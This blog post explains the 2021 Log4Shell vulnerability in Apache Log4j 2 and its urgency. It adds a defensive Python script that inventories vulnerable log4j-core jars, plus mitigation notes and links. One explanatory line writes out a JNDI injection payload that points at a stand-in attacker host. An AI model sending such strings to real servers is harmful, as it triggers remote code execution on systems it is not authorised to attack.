As if we did not have enough worries with Delta and Omicron in the days leading to the December holiday season, the Internet is on fire with news about a vulnerability that lets attackers make Internet servers running the widely used Apache Log4j Java logging library execute code of the attacker's choosing. With that foothold an attacker can read server data, tamper with files and programs and, in the worst case, take over the server outright.
The vulnerability is tracked as CVE-2021-44228 and is best known as Log4Shell (early reports also called it LogJam, or simply "Log4j" after the library). It is rated critical and carries the maximum CVSS score of 10.0. The bug was originally disclosed to Apache on November 24th by Chen Zhaojun of the Alibaba Cloud Security Team, more than two weeks ago.
The weakness is in a library whose only job is to write log messages. It is hard to fathom how a routine that writes status messages to a file can be so dangerous. As with so many exploits before it, the root of the problem is that the library lets the message being logged trigger execution of code chosen by whoever wrote that message. Log4j 2 scans every message for "lookups" written as ${...} and substitutes their values before writing the line. One of those lookups, JNDI (e.g., "${jndi:ldap://[attacker site]/a}"), makes the server contact a directory server at the named address and load whatever it returns; if the reply points at a Java class hosted by the attacker (or carries a serialized Java object), the server downloads and runs it, which is the dreaded Remote Code Execution (RCE). Anything an attacker can get into a log line, such as a username, a web form field or an HTTP User-Agent header, is enough.
Temporary workarounds that disable the vulnerable feature have been posted, and the Apache Software Foundation has released version 2.15.0 of the library.
Note that the immediate risk is not to computers in the average home, even though many client apps use the library. It is the server applications reachable by remote attackers that are being exploited, which puts the data and passwords stored on those servers at risk.
Unfortunately, this library is used very widely and the bug is trivially easy to exploit. It will take time for organizations to patch every installed copy of the software; meanwhile, this will be a Christmas gift for hackers, who will be busy figuring out how to exploit it for profit, mischief and fun.
Marcus Hutchins, a prominent security researcher and hacker extraordinaire, best known for halting the global WannaCry malware attack, is worried -
The exploit was first spotted in the wild on Minecraft game servers, but it is now far more widespread. Its consequences are being described with phrases such as "Mini Internet Meltdown" and "Javageddon".
It is a race now between hackers and IT managers.
We will be seeing many such reports of attacks in the coming days -
I hope DailyKos IT staff is aware of this as well and is taking steps to upgrade the library.
The official logo of Log4Shell!
Some details for IT experts
From access.redhat.com/… —
Apache Log4j is a library for logging functionality in Java-based applications. A flaw was found in Apache Log4j 2 (an upgrade to Log4j), allowing a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's Java Naming and Directory Interface™ (JNDI) Lightweight Directory Access Protocol (LDAP) server lookup.
This flaw allows a remote attacker to execute code on the target system with the same privileges as the Java-based application that invoked Apache Log4j 2.
From www.mcafee.com/… —
The vulnerability exists in the way the Java Naming and Directory Interface (JNDI) feature resolves variables. When a JNDI reference is being written to a log, JNDI will fetch all requirements to resolve the variable. To complete this process, it will download and execute any remote classes required. This applies to both server-side and client-side applications since the main requirements for the vulnerability are any attacker-controlled input field and this input being passed to the log.
To orchestrate this attack, an attacker can use several different JNDI lookups. The most popular lookup currently being seen in both PoCs and active exploitation is utilizing LDAP; however, other lookups such as RMI and DNS are also viable attack vectors.
Lots of technical info at this site on how the exploit works, how to detect the vulnerability and how to patch systems temporarily and permanently.
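Part of "how to detect the vulnerability" is simply finding every copy of log4j-core on a machine and reading its version, including copies buried inside .war, .ear and fat .jar files, which is where most of them hide. The Python script below is an added example for that inventory step; it is not from this post, from Apache or from any vendor scanner. It assumes that official log4j-core jars carry a Maven pom.properties at META-INF/maven/org.apache.logging.log4j/log4j-core/ with a "version=" line and that the JNDI lookup class lives at org/apache/logging/log4j/core/lookup/JndiLookup.class; a jar that has the class but no metadata (a shaded or relocated copy) is flagged for review. The version threshold is a parameter that defaults to the 2.15.0 release this post cites; later Log4j releases superseded it, so pass whatever your current advisory recommends. The fixture it scans is fabricated in a temporary directory so the script runs offline.

```python
"""Added example: inventory log4j-core jars on disk, descending into .war/.ear/fat-jar files."""
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import Dict, Iterator, List, Optional, Tuple

# Assumed layout of official log4j-core jars (Maven metadata and the JNDI lookup class).
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
MAX_NESTING = 3  # how deep to descend into archives within archives
def parse_version(text: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0), so betas sort as older."""
    return tuple(int(p) for p in re.findall(r"\d+", text.split("-")[0]))

@dataclass
class Finding:
    location: str            # path; nested archives joined with '!'
    version: Optional[str]   # None when no log4j-core pom.properties was present
    has_jndi_lookup: bool

    def is_vulnerable(self, fixed: str = "2.15.0") -> bool:
        if self.version is None:
            # Shaded/relocated copy without Maven metadata: the class is the only evidence.
            return self.has_jndi_lookup
        return parse_version(self.version) < parse_version(fixed)

def inspect_archive(zf: zipfile.ZipFile, location: str, depth: int = 0) -> Iterator[Finding]:
    """Yield a Finding if this archive looks like log4j-core, then recurse into nested ones."""
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    if version is not None or JNDI_CLASS in names:
        yield Finding(location, version, JNDI_CLASS in names)
    if depth >= MAX_NESTING:
        return
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            inner = io.BytesIO(zf.read(name))  # nested archive held in memory
            if zipfile.is_zipfile(inner):
                with zipfile.ZipFile(inner) as inner_zf:
                    yield from inspect_archive(inner_zf, f"{location}!{name}", depth + 1)

def scan_tree(root: str) -> List[Finding]:
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for filename in sorted(filenames):
            if not filename.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            path = os.path.join(dirpath, filename)
            location = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                with zipfile.ZipFile(path) as zf:
                    findings.extend(inspect_archive(zf, location))
            except (zipfile.BadZipFile, OSError):
                continue  # not really a zip, or unreadable
    return findings

# --- constructed fixture (fabricated jars) so the scanner can be exercised offline ---
def _zip_bytes(entries: Dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

def _fake_log4j_core(version: str) -> Dict[str, bytes]:
    props = f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n"
    return {POM_PROPS: props.encode(), JNDI_CLASS: b"\xca\xfe\xba\xbe"}

def build_fixture(root: str) -> None:
    """Write a small pretend deployment under root; every file is fabricated."""
    files = {
        "lib/log4j-core-2.14.1.jar": _fake_log4j_core("2.14.1"),
        "lib/log4j-core-2.15.0.jar": _fake_log4j_core("2.15.0"),
        "lib/shaded-app.jar": {JNDI_CLASS: b"\xca\xfe\xba\xbe", "com/example/App.class": b""},
        "app.war": {"WEB-INF/lib/log4j-core-2.13.3.jar": _zip_bytes(_fake_log4j_core("2.13.3"))},
    }
    for rel, entries in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(_zip_bytes(entries))

def demo_scan() -> List[Tuple[str, Optional[str], bool]]:
    """Build the fixture in a temp dir, scan it and return (location, version, vulnerable)."""
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        return sorted((f.location, f.version, f.is_vulnerable()) for f in scan_tree(tmp))

if __name__ == "__main__":
    print(*demo_scan(), sep="\n")
```

For a real host, call scan_tree("/") (or the application directories) instead of the fixture and review every Finding whose is_vulnerable() is true, remembering that an archive nested deeper than MAX_NESTING levels is not opened and that each nested archive is read fully into memory.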
Detailed instructions from Microsoft -
Here is a site that is tracking the source addresses of these attacks. Organizations can block traffic from those addresses while they upgrade their software.
The Vaccine
This tool, developed by Cybereason, uses the vulnerability itself to remotely and temporarily "vaccinate" a vulnerable server: its payload sets the JVM property log4j2.formatMsgNoLookups to true, which disables expansion of strings such as "${jndi:ldap:..." in log messages. Two caveats: the setting only exists in Log4j 2.10 and later, and the change lives only in the running process, so a restart undoes it. It buys time; it is not a substitute for upgrading.
Epilogue
This will be a Christmas nightmare for many companies, their IT departments and their customers. Let's hope IT security professionals and U.S. government agencies can keep this exploit from crippling the holiday season.
How do you think industry and government should address this growing scourge? Is it an intractable problem, given the way current software and the Internet are designed and our reliance on complex software systems built using old-fashioned, human-based methods? Is it a matter of will and investment? Should there be a Manhattan Project to address this issue? It is not just about stealing data or ransomware but also the ability of state and non-state bad actors to knock out critical infrastructure which we all depend on — power generation and distribution, pipelines, transportation, banks, hospitals, communications, election systems, weapon systems, …
Further Reading
- Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package — www.lunasec.io/…
- Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack — threatpost.com/…
- Log4Shell Vulnerability is the Coal in our Stocking for 2021 — www.mcafee.com/…
- ‘Extremely bad’ vulnerability found in widely used logging system — www.theverge.com/…
- Security warning: New zero-day in the Log4j Java library is already being exploited — www.zdnet.com/…
- Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation — www.microsoft.com/…
- Cybereason Releases Vaccine to Prevent Exploitation of Apache Log4Shell Vulnerability (CVE-2021-44228) — www.cybereason.com/…